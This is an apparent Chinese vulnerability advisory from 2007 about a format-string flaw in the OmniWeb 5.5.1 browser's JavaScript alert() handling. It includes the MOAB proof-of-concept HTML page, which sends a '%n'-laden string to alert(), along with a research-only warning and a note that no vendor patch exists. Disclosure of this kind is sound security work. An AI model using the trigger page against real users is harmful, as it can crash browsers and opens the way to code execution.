发布日期：2007-01-08
更新日期：2007-01-09

受影响系统：

Omni Group OmniWeb 5.5.1 (v607.5)

描述：

---

BUGTRAQ  ID: 21911

OmniWeb是运行在MacOS上的浏览器。

OmniWeb在处理alert() Javascript函数时存在格式串处理漏洞，如果用户受骗访问了恶意的WEB页面的话，就可能导致执行任意指令，攻击者从而控制用户机器。

<*来源：Kevin Finisterre （dotslash@snosoft.com）
  
  链接：http://secunia.com/advisories/23624/
        http://projects.info-pull.com/moab/MOAB-07-01-2007.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
    "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
    <head>
        <title>MOAB-07-01-2007</title>
        <script>
            /* LMH */
            function boom() {
                var str = 'A';
                while (str.length <= 32) str+=str;
                str = str + '%n%n%n%n%n%n';
                alert(str);
            }
        </script>
    </head>
    <body>
        <input type="button" onclick="boom();" value="Test MOAB-07-01-2007" />
    </body>

</html>

建议：

---

厂商补丁：

Omni Group
----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.omnigroup.com/applications/omniweb/

浏览次数：2818
严重程度：0（网友投票）